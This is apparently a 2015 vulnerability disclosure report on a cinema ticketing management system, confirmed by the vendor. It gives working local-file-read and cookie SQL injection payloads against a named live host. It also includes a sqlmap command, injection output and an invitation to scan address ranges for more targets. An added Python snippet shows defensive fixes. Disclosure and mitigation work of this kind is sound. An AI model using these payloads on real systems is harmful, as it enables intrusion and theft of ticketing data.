2015-07-29: Details reported to the vendor, awaiting vendor handling
2015-07-31: Vendor has confirmed; details disclosed to the vendor only
2015-08-03: Details opened to third-party security partners
2015-09-24: Details opened to core white hats and experts in the relevant field
2015-10-04: Details opened to regular white hats
2015-10-14: Details opened to intern white hats
2015-10-29: Details disclosed to the public

Multiple vulnerabilities in a ticketing management system can affect ticket sales nationwide
Anyone who goes to the cinema regularly will notice that almost every cinema sells tickets through the "鼎新影院计算机售票管理系统" (Dingxin Cinema Computerised Ticketing Management System). It is the ticketing system used by cinema chains across the whole country, so the impact is very large.
Search Baidu for: 鼎新影院计算机售票管理系统. This turns up one cinema's instance exposed on the Internet.
First, a local file read (the m parameter is used as an include path; the trailing %00 is a null-byte truncation):
http://yinghezhong.com/?m=../../../../../../../../../../etc/passwd%00
Next, an injection. The raw request saved to http.txt:
GET /?m=login HTTP/1.1
Host: yinghezhong.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: TSID=qvgovg6jjlkl5a5d3fkj1d2qm4;code=test*
Connection: keep-alive

The code value in the Cookie header is the injection parameter (the trailing * marks it as the injection point for sqlmap). sqlmap command:
sqlmap -r http.txt --dbms=mysql --level 4 --dbs
Then the (very large) database table listing.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: TSID=qvgovg6jjlkl5a5d3fkj1d2qm4;code=-4886' OR (3879=3879)#

    Type: UNION query
    Title: MySQL UNION query (NULL) - 23 columns
    Payload: TSID=qvgovg6jjlkl5a5d3fkj1d2qm4;code=test' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786b6271,0x7a695771475a50664a6b,0x71626a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query - comment)
    Payload: TSID=qvgovg6jjlkl5a5d3fkj1d2qm4;code=test' AND 4973=BENCHMARK(5000000,MD5(0x76747570))#
---
back-end DBMS: MySQL >= 5.0.0
Database: cine
[261 tables]
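Both bugs above come down to attacker-controlled values reaching an include path and a SQL string unchanged. The following is an added example (not code from the report or from the vendor's product) of the two fixes a defender would apply: the m parameter is checked against an allowlist, rejected if it contains a NUL byte, and forced to resolve inside the module directory, while the Cookie code value goes through a parameterised query. MODULE_DIR, the allowlist and the column names are hypothetical; the cinema_user_info table name and the payload shapes are from the report.

```python
import os
import sqlite3
import urllib.parse
from typing import Optional

MODULE_DIR = os.path.realpath("/srv/app/modules")  # hypothetical install path
ALLOWED_MODULES = {"login", "index", "ticket"}     # hypothetical allowlist


def resolve_module(m: str) -> Optional[str]:
    """Return the module file for ?m=..., or None if the value is unsafe.

    Three independent checks: the URL-decoded value must contain no NUL byte
    (the %00 truncation trick), must be on the allowlist, and must still
    resolve inside MODULE_DIR after realpath() collapses any ../ segments.
    """
    name = urllib.parse.unquote(m)
    if "\x00" in name or name not in ALLOWED_MODULES:
        return None
    path = os.path.realpath(os.path.join(MODULE_DIR, name + ".php"))
    if os.path.commonpath([MODULE_DIR, path]) != MODULE_DIR:
        return None
    return path


def lookup_code(conn: sqlite3.Connection, code: str):
    """Parameterised replacement for a query built by string concatenation.

    The driver sends `code` as data, so quotes, comments and UNION keywords
    in the cookie value are compared literally instead of being parsed as SQL.
    """
    return conn.execute(
        "SELECT id, name FROM cinema_user_info WHERE code = ?", (code,)
    ).fetchone()


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the backend (columns are hypothetical)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cinema_user_info (id INTEGER, name TEXT, code TEXT)")
    conn.execute("INSERT INTO cinema_user_info VALUES (1, 'demo', 'test')")
    return conn


if __name__ == "__main__":
    print(resolve_module("../../../../../../../../../../etc/passwd%00"))  # None
    print(lookup_code(demo_db(), "-4886' OR (3879=3879)#"))             # None
```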
Two more Internet-exposed instances that can be found through Google and Baidu, added as supplementary cases.
This is all I can offer for Internet-exposed instances; if you want more, go and scan the CN address ranges yourself.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-07-31 20:32
Regarding the issue you raised, we have notified the business staff to begin an investigation. Thank you for your attention and support.
None yet